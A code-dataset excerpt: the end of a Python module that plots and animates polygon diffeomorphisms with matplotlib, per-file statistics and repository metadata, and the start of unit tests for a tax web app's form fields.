    # Dilate the polygon by varepsilon (round joins) and extract the exterior ring
    dilated = Polygon(PolygonVertices).buffer(DiffeoParams['varepsilon'], join_style=1)
    dilated_boundary = numpy.vstack((dilated.exterior.coords.xy[0], dilated.exterior.coords.xy[1]))
    # Draw the original polygon
    plt.plot(boundary[0][:], boundary[1][:], '-b')
    plt.axis('equal')
    # Build the diffeomorphism tree with the convex decomposition method
    tree = diffeoTreeConvex(PolygonVertices, DiffeoParams)
    # Draw each tree node: its augmented polygon, its dilated version and its center
    for node in tree:
        cell = numpy.vstack((node['augmented_vertices'], node['augmented_vertices'][0])).transpose()
        plt.plot(cell[0][:], cell[1][:], '-b')
        cell_tilde = numpy.vstack((node['vertices_tilde'], node['vertices_tilde'][0])).transpose()
        plt.plot(cell_tilde[0][:], cell_tilde[1][:])
        plt.plot(node['center'][0][0], node['center'][0][1], 'ok')
    # Draw the dilated polygon boundary
    plt.plot(dilated_boundary[0][:], dilated_boundary[1][:], '-m')
    plt.show()
    return tree
def visualize_map_triangulation(PolygonVertices, DiffeoParams):
    """
    Function that plots the final sphere constructed from a diffeomorphism of one polygon (based on the ear clipping method)
    Input:
        1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
        2) DiffeoParams: Options for the diffeomorphism construction
    Test:
        import numpy
        import visualization
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.0
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.0
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_map_triangulation(xy, diffeo_params)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
        xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
    """
    # Transpose the input so row 0 holds the x and row 1 the y coordinates
    xy_transpose = PolygonVertices.transpose()
    # Construct the interpolation functions that parametrize the polygon boundary
    t = numpy.linspace(0, PolygonVertices.shape[0]+1, num=PolygonVertices.shape[0], endpoint=True)
    f_x = scipy.interpolate.interp1d(t, xy_transpose[0][:])
    f_y = scipy.interpolate.interp1d(t, xy_transpose[1][:])
    # Resample the boundary densely (1001 points) for a smooth curve
    t_new = numpy.linspace(0, PolygonVertices.shape[0]+1, num=1001, endpoint=True)
    x_new = f_x(t_new)
    y_new = f_y(t_new)
    # Plot the initial polygon (vertices as markers, resampled boundary as a line)
    plt.plot(xy_transpose[0][:], xy_transpose[1][:], 'o', x_new, y_new, '-')
    plt.axis('equal')
    # Find the points on the final sphere by pushing every resampled boundary
    # point through the polygon diffeomorphism
    tree = diffeoTreeTriangulation(PolygonVertices, DiffeoParams)
    # Collect the mapped points in a list and stack once at the end;
    # calling numpy.vstack per iteration would be quadratic in the point count
    deformed_points = []
    for i in range(len(t_new)):
        x_deformed, _, _ = polygonDiffeoTriangulation(numpy.array([[x_new[i],y_new[i]]]), tree, DiffeoParams)
        deformed_points.append(x_deformed)
    # Plot the sphere
    x_deformed_array = numpy.vstack(deformed_points).transpose()
    plt.plot(x_deformed_array[0][:], x_deformed_array[1][:], '')
    plt.show()
    return
def visualize_map_convex(PolygonVertices, DiffeoParams):
    """
    Function that plots the final sphere constructed from a diffeomorphism of one polygon (based on the convex decomposition method)
    Input:
        1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
        2) DiffeoParams: Options for the diffeomorphism construction
    Test:
        import numpy
        import visualization
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.0
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.0
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_map_convex(xy, diffeo_params)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
        xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
    """
    # Transpose the input so row 0 holds the x and row 1 the y coordinates
    xy_transpose = PolygonVertices.transpose()
    # Construct the interpolation functions that parametrize the polygon boundary
    t = numpy.linspace(0, PolygonVertices.shape[0]+1, num=PolygonVertices.shape[0], endpoint=True)
    f_x = scipy.interpolate.interp1d(t, xy_transpose[0][:])
    f_y = scipy.interpolate.interp1d(t, xy_transpose[1][:])
    # Resample the boundary densely (1001 points) for a smooth curve
    t_new = numpy.linspace(0, PolygonVertices.shape[0]+1, num=1001, endpoint=True)
    x_new = f_x(t_new)
    y_new = f_y(t_new)
    # Plot the initial polygon (vertices as markers, resampled boundary as a line)
    plt.plot(xy_transpose[0][:], xy_transpose[1][:], 'o', x_new, y_new, '-')
    plt.axis('equal')
    # Find the points on the final sphere by pushing every resampled boundary
    # point through the polygon diffeomorphism
    tree = diffeoTreeConvex(PolygonVertices, DiffeoParams)
    # Collect the mapped points in a list and stack once at the end;
    # calling numpy.vstack per iteration would be quadratic in the point count
    deformed_points = []
    for i in range(len(t_new)):
        x_deformed, _, _ = polygonDiffeoConvex(numpy.array([[x_new[i],y_new[i]]]), tree, DiffeoParams)
        deformed_points.append(x_deformed)
    # Plot the sphere
    x_deformed_array = numpy.vstack(deformed_points).transpose()
    plt.plot(x_deformed_array[0][:], x_deformed_array[1][:], '')
    plt.show()
    return
def visualize_purging_triangulation(PolygonVertices, DiffeoParams, FramesPerTriangle, TimeInterval, SaveOption):
    """
    Function that shows an animation for a purging diffeomorphism of one polygon (based on the ear clipping method)
    Input:
        1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
        2) DiffeoParams: Options for the diffeomorphism construction
        3) FramesPerTriangle: Frames per triangle visualization
        4) TimeInterval: Time interval in ms between each frame
        5) SaveOption: True if gif is to be saved, False otherwise
    Test:
        import numpy
        import visualization
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.0
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.0
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_purging_triangulation(xy, diffeo_params, 30, 50, False)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
        xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
    """
    # Find the polygon
    input_polygon = Polygon(PolygonVertices)
    # Transpose the input so row 0 holds the x and row 1 the y coordinates
    xy_transpose = PolygonVertices.transpose()
    # Construct the interpolation functions that parametrize the polygon boundary
    t = numpy.linspace(0, PolygonVertices.shape[0]+1, num=PolygonVertices.shape[0], endpoint=True)
    f_x = scipy.interpolate.interp1d(t, xy_transpose[0][:])
    f_y = scipy.interpolate.interp1d(t, xy_transpose[1][:])
    # Find the new points (dense resampling of the boundary, 1001 points)
    t_new = numpy.linspace(0, PolygonVertices.shape[0]+1, num=1001, endpoint=True)
    x_new = f_x(t_new)
    y_new = f_y(t_new)
    xy_new = numpy.vstack((x_new,y_new)).transpose()
    # Find the diffeomorphism tree
    tree = diffeoTreeTriangulation(PolygonVertices, DiffeoParams)
    # # Find grid points
    # nrows = 1 + int(numpy.ceil((numpy.max(y_new)+0.5)-(numpy.min(y_new)-0.5))/0.5)
    # ncols = 1 + int(numpy.ceil((numpy.max(x_new)+0.5)-(numpy.min(x_new)-0.5))/0.5)
    # discretization_rows = ((numpy.max(y_new)+0.5)-(numpy.min(y_new)-0.5))/(nrows-1)
    # discretization_cols = ((numpy.max(x_new)+0.5)-(numpy.min(x_new)-0.5))/(ncols-1)
    # num_points = 1000
    # x_grid = []
    # y_grid = []
    # for row in range(0,nrows):
    #     result_x = numpy.array([])
    #     result_y = numpy.array([])
    #     for point_index in range(0,num_points):
    #         x_point = (numpy.min(x_new)-0.5) + (point_index/num_points)*((numpy.max(x_new)+0.5)-(numpy.min(x_new)-0.5))
    #         y_point = (numpy.min(y_new)-0.5) + row*discretization_rows
    #         if not input_polygon.contains(Point(x_point,y_point)):
    #             result_x = numpy.hstack((result_x,x_point))
    #             result_y = numpy.hstack((result_y,y_point))
    #         else:
    #             x_grid.append(result_x)
    #             y_grid.append(result_y)
    #             result_x = numpy.array([])
    #             result_y = numpy.array([])
    #     x_grid.append(result_x)
    #     y_grid.append(result_y)
    # for col in range(0,ncols):
    #     result_x = numpy.array([])
    #     result_y = numpy.array([])
    #     for point_index in range(0,num_points):
    #         x_point = (numpy.min(x_new)-0.5) + col*discretization_cols
    #         y_point = (numpy.min(y_new)-0.5) + (point_index/num_points)*((numpy.max(y_new)+0.5)-(numpy.min(y_new)-0.5))
    #         if not input_polygon.contains(Point(x_point,y_point)):
    #             result_x = numpy.hstack((result_x,x_point))
    #             result_y = numpy.hstack((result_y,y_point))
    #         else:
    #             x_grid.append(result_x)
    #             y_grid.append(result_y)
    #             result_x = numpy.array([])
    #             result_y = numpy.array([])
    #     x_grid.append(result_x)
    #     y_grid.append(result_y)
    # Initialize plot
    fig, ax = plt.subplots()
    fig.set_tight_layout(True)
    xy_plot, = ax.plot(x_new, y_new, '-', linewidth = 2)
    # xy_grid = [None]*len(x_grid)
    # for i in range(0,len(x_grid)):
    #     xy_grid[i], = ax.plot(x_grid[i], y_grid[i], '-')
    #     xy_grid[i].set_color('gray')
    ax.axis([numpy.min(x_new)-0.5,numpy.max(x_new)+0.5,numpy.min(y_new)-0.5,numpy.max(y_new)+0.5])
    ax.set_aspect('equal', 'box')
    ax.set_yticks([])
    ax.set_xticks([])
    # Iterate through the tree for the polygon points:
    # row r of x_to_animate/y_to_animate holds the boundary after purging the
    # first r triangles, so consecutive rows are the animation's keyframes
    x_to_animate = numpy.array([x_new])
    y_to_animate = numpy.array([y_new])
    for j in range(len(tree)):
        x_deformed_array = numpy.array([[0,0]])
        for k in range(0,len(t_new)):
            x_deformed, x_deformedd, x_deformeddd = triangleDiffeo(numpy.array([[x_to_animate[-1][k],y_to_animate[-1][k]]]), tree[j], DiffeoParams)
            x_deformed_array = numpy.vstack((x_deformed_array, x_deformed))
        x_deformed_array = x_deformed_array[1:][:].transpose()
        x_to_animate = numpy.vstack((x_to_animate,x_deformed_array[0][:]))
        y_to_animate = numpy.vstack((y_to_animate,x_deformed_array[1][:]))
    # Duplicate the final keyframe: at the last frame index update() reads row
    # index_to_consider+1 == len(tree)+1, so the extra row makes the animation
    # hold (interpolate within) the fully-purged shape instead of indexing past the end
    x_to_animate = numpy.vstack((x_to_animate,x_deformed_array[0][:]))
    y_to_animate = numpy.vstack((y_to_animate,x_deformed_array[1][:]))
    # # Iterate through the tree for the grid points
    # x_to_animate_grid = [None]*len(x_grid)
    # y_to_animate_grid = [None]*len(y_grid)
    # for i in range(0,len(x_grid)):
    #     x_to_animate_grid[i] = numpy.array([x_grid[i]])
    #     y_to_animate_grid[i] = numpy.array([y_grid[i]])
    #     for j in range(len(tree)):
    #         x_deformed_array_grid = numpy.array([[0,0]])
    #         for k in range(0,len(x_grid[i])):
    #             x_deformed_grid, x_deformedd_gri, x_deformeddd_grid = triangleDiffeo(numpy.array([[x_to_animate_grid[i][-1][k],y_to_animate_grid[i][-1][k]]]), tree[j], DiffeoParams)
    #             x_deformed_array_grid = numpy.vstack((x_deformed_array_grid, x_deformed_grid))
    #         x_deformed_array_grid = x_deformed_array_grid[1:][:].transpose()
    #         x_to_animate_grid[i] = numpy.vstack((x_to_animate_grid[i],x_deformed_array_grid[0][:]))
    #         y_to_animate_grid[i] = numpy.vstack((y_to_animate_grid[i],x_deformed_array_grid[1][:]))
    #     x_to_animate_grid[i] = numpy.vstack((x_to_animate_grid[i],x_deformed_array_grid[0][:]))
    #     y_to_animate_grid[i] = numpy.vstack((y_to_animate_grid[i],x_deformed_array_grid[1][:]))
    def update(i):
        # Frame callback: linearly blend between keyframe index_to_consider and
        # the next one, with blend fraction (i%FramesPerTriangle)/FramesPerTriangle
        # Find the index to consider
        index_to_consider = int(numpy.floor(i/FramesPerTriangle))
        label = 'Purging triangle {0}'.format(index_to_consider+1)
        # Animate data
        xy_plot.set_xdata(((i%FramesPerTriangle)/FramesPerTriangle)*x_to_animate[index_to_consider+1][:] + (1-((i%FramesPerTriangle)/FramesPerTriangle))*x_to_animate[index_to_consider][:])
        xy_plot.set_ydata(((i%FramesPerTriangle)/FramesPerTriangle)*y_to_animate[index_to_consider+1][:] + (1-((i%FramesPerTriangle)/FramesPerTriangle))*y_to_animate[index_to_consider][:])
        # for j in range(0,len(x_grid)):
        #     xy_grid[j].set_xdata(((i%FramesPerTriangle)/FramesPerTriangle)*x_to_animate_grid[j][index_to_consider+1][:] + (1-((i%FramesPerTriangle)/FramesPerTriangle))*x_to_animate_grid[j][index_to_consider][:])
        #     xy_grid[j].set_ydata(((i%FramesPerTriangle)/FramesPerTriangle)*y_to_animate_grid[j][index_to_consider+1][:] + (1-((i%FramesPerTriangle)/FramesPerTriangle))*y_to_animate_grid[j][index_to_consider][:])
        ax.set_xlabel(label)
        # When saving, also dump every frame as an individual PDF
        # (relative path - assumes the script runs from its own directory)
        if SaveOption == True:
            fig.savefig('./../../data/visualizations/figure_' + str(i) + '.pdf', bbox_inches='tight')
        return xy_plot, ax
    # Initialize FuncAnimation object
    anim = FuncAnimation(fig, update, frames=numpy.arange(0, 1+FramesPerTriangle*len(tree)), interval=TimeInterval)
    if SaveOption == True:
        anim.save('./../../data/visualizations/diffeomorphism_triangulation.gif', dpi=80, writer='imagemagick')
    else:
        plt.show()
    return
def visualize_purging_convex(PolygonVertices, DiffeoParams, FramesPerPolygon, TimeInterval, SaveOption):
    """
    Function that shows an animation for a purging diffeomorphism of one polygon (based on convex decomposition)
    Input:
        1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
        2) DiffeoParams: Options for the diffeomorphism construction
        3) FramesPerPolygon: Frames per polygon visualization
        4) TimeInterval: Time interval in ms between each frame
        5) SaveOption: True if gif is to be saved, False otherwise
    Test:
        import numpy
        import visualization
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.0
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.0
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_purging_convex(xy, diffeo_params, 30, 50, False)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
        xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
    """
    # Shapely polygon for the input boundary.
    # NOTE(review): only used by the (removed) commented-out grid-overlay code;
    # kept because removing it would be a code change.
    input_polygon = Polygon(PolygonVertices)
    # Transpose the input so that row 0 holds x coordinates and row 1 holds y
    xy_transpose = PolygonVertices.transpose()
    # Construct the interpolation functions over a parameter t that spans the
    # closed polygon boundary (start vertex == end vertex by contract)
    t = numpy.linspace(0, PolygonVertices.shape[0]+1, num=PolygonVertices.shape[0], endpoint=True)
    f_x = scipy.interpolate.interp1d(t, xy_transpose[0][:])
    f_y = scipy.interpolate.interp1d(t, xy_transpose[1][:])
    # Densely resample the boundary (1001 points) so the animated outline is smooth
    t_new = numpy.linspace(0, PolygonVertices.shape[0]+1, num=1001, endpoint=True)
    x_new = f_x(t_new)
    y_new = f_y(t_new)
    xy_new = numpy.vstack((x_new,y_new)).transpose()
    # Find the diffeomorphism tree of the polygon's convex decomposition;
    # each node describes one purging transformation to apply in sequence
    tree = diffeoTreeConvex(PolygonVertices, DiffeoParams)
    # Initialize plot: outline of the polygon, equal aspect, no tick labels
    fig, ax = plt.subplots()
    fig.set_tight_layout(True)
    xy_plot, = ax.plot(x_new, y_new, '-', linewidth = 2)
    ax.axis([numpy.min(x_new)-0.5,numpy.max(x_new)+0.5,numpy.min(y_new)-0.5,numpy.max(y_new)+0.5])
    ax.set_aspect('equal', 'box')
    ax.set_yticks([])
    ax.set_xticks([])
    # Iterate through the tree for the polygon points: row i of
    # x_to_animate/y_to_animate holds the boundary after applying the first i
    # purging transformations (row 0 is the undeformed boundary)
    x_to_animate = numpy.array([x_new])
    y_to_animate = numpy.array([y_new])
    for j in range(len(tree)):
        # Seed row [0,0] is a vstack placeholder, stripped below with [1:]
        x_deformed_array = numpy.array([[0,0]])
        for k in range(0,len(t_new)):
            # Map each boundary point through the j-th purging transformation
            x_deformed, x_deformedd, x_deformeddd = polygonDiffeo(numpy.array([[x_to_animate[-1][k],y_to_animate[-1][k]]]), tree[j], DiffeoParams)
            x_deformed_array = numpy.vstack((x_deformed_array, x_deformed))
        # Drop the placeholder row and transpose to rows of x and y
        x_deformed_array = x_deformed_array[1:][:].transpose()
        x_to_animate = numpy.vstack((x_to_animate,x_deformed_array[0][:]))
        y_to_animate = numpy.vstack((y_to_animate,x_deformed_array[1][:]))
    # Duplicate the final shape once more: the animation below indexes
    # index_to_consider+1, and the last frame (i == FramesPerPolygon*len(tree))
    # needs a valid row at len(tree)+1
    x_to_animate = numpy.vstack((x_to_animate,x_deformed_array[0][:]))
    y_to_animate = numpy.vstack((y_to_animate,x_deformed_array[1][:]))
    def update(i):
        # Find the index of the purging transformation currently being animated
        index_to_consider = int(numpy.floor(i/FramesPerPolygon))
        label = 'Purging polygon {0}'.format(index_to_consider+1)
        # Animate data: linearly interpolate between consecutive deformations
        xy_plot.set_xdata(((i%FramesPerPolygon)/FramesPerPolygon)*x_to_animate[index_to_consider+1][:] + (1-((i%FramesPerPolygon)/FramesPerPolygon))*x_to_animate[index_to_consider][:])
        xy_plot.set_ydata(((i%FramesPerPolygon)/FramesPerPolygon)*y_to_animate[index_to_consider+1][:] + (1-((i%FramesPerPolygon)/FramesPerPolygon))*y_to_animate[index_to_consider][:])
        ax.set_xlabel(label)
        if SaveOption == True:
            # Also dump every frame as a standalone PDF when saving is requested
            fig.savefig('./../../data/visualizations/figure_' + str(i) + '.pdf', bbox_inches='tight')
        return xy_plot, ax
    # Initialize FuncAnimation object (one extra frame so the last shape is shown)
    anim = FuncAnimation(fig, update, frames=numpy.arange(0, 1+FramesPerPolygon*len(tree)), interval=TimeInterval)
    if SaveOption == True:
        anim.save('./../../data/visualizations/diffeomorphism_convex.gif', dpi=80, writer='imagemagick')
    else:
        plt.show()
    return
| 58.535984
| 456
| 0.705798
| 14,011
| 85,404
| 4.205053
| 0.038969
| 0.013069
| 0.009267
| 0.009709
| 0.894275
| 0.873873
| 0.860244
| 0.847956
| 0.838043
| 0.831526
| 0
| 0.093125
| 0.09886
| 85,404
| 1,459
| 457
| 58.535984
| 0.672419
| 0.520222
| 0
| 0.762923
| 0
| 0
| 0.013072
| 0.004318
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026738
| false
| 0
| 0.016043
| 0
| 0.069519
| 0.008913
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d1386cb6d46469516e5ec8b9aa204c83a35dde96
| 11,845
|
py
|
Python
|
webapp/tests/forms/test_fields.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 20
|
2021-07-02T07:49:08.000Z
|
2022-03-18T22:26:10.000Z
|
webapp/tests/forms/test_fields.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 555
|
2021-06-28T15:35:15.000Z
|
2022-03-31T11:51:55.000Z
|
webapp/tests/forms/test_fields.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 1
|
2021-07-04T20:34:12.000Z
|
2021-07-04T20:34:12.000Z
|
import unittest
import datetime as dt
from werkzeug.datastructures import MultiDict
from app.forms import SteuerlotseBaseForm
from app.forms.fields import IdNrField, SteuerlotseDateField, UnlockCodeField, _add_classes_to_kwargs
from app.forms.validations.validators import ValidIdNr
class TestAddClassesToKwargs(unittest.TestCase):
    """Checks that _add_classes_to_kwargs merges CSS classes into a kwargs dict."""

    def test_if_kwargs_is_empty_and_one_class_then_set_correctly(self):
        field_kwargs = {}
        _add_classes_to_kwargs(field_kwargs, ['one_class'])
        self.assertEqual('one_class', field_kwargs.get('class'))

    def test_if_kwargs_is_empty_and_many_classes_then_set_correctly(self):
        field_kwargs = {}
        _add_classes_to_kwargs(field_kwargs, ['one_class', 'second_class', 'third_class'])
        self.assertEqual('one_class second_class third_class', field_kwargs.get('class'))

    def test_if_kwargs_is_not_empty_and_one_class_then_set_correctly(self):
        field_kwargs = {'class': 'old_class'}
        _add_classes_to_kwargs(field_kwargs, ['one_class'])
        self.assertEqual('old_class one_class', field_kwargs.get('class'))

    def test_if_kwargs_is_not_empty_and_many_classes_then_set_correctly(self):
        field_kwargs = {'class': 'old_class'}
        _add_classes_to_kwargs(field_kwargs, ['one_class', 'second_class', 'third_class'])
        self.assertEqual('old_class one_class second_class third_class', field_kwargs.get('class'))
class IdNrForm(SteuerlotseBaseForm):
    """Minimal form with a single validated tax-ID field, used as a test fixture."""
    idnr_field = IdNrField(validators=[ValidIdNr()])
class TestIdNrFieldData(unittest.TestCase):
    """Checks how IdNrField.data is populated for GET and POST scenarios."""

    def setUp(self):
        self.form = IdNrForm()

    def test_if_no_data_and_no_formdata_given_then_return_none(self):
        """GET request without prefilled data leaves the field empty."""
        self.form.process()
        self.assertEqual(None, self.form.idnr_field.data)

    def test_if_data_given_and_no_formdata_then_store_data_as_is(self):
        """GET request with prefilled data keeps the value unchanged."""
        stored_idnr = '02259674819'
        self.form.process(data={'idnr_field': stored_idnr})
        self.assertEqual(stored_idnr, self.form.idnr_field.data)

    def test_if_no_data_given_and_invalid_formdata_then_store_form_data_as_is(self):
        """POST request with invalid formdata and no prefilled data."""
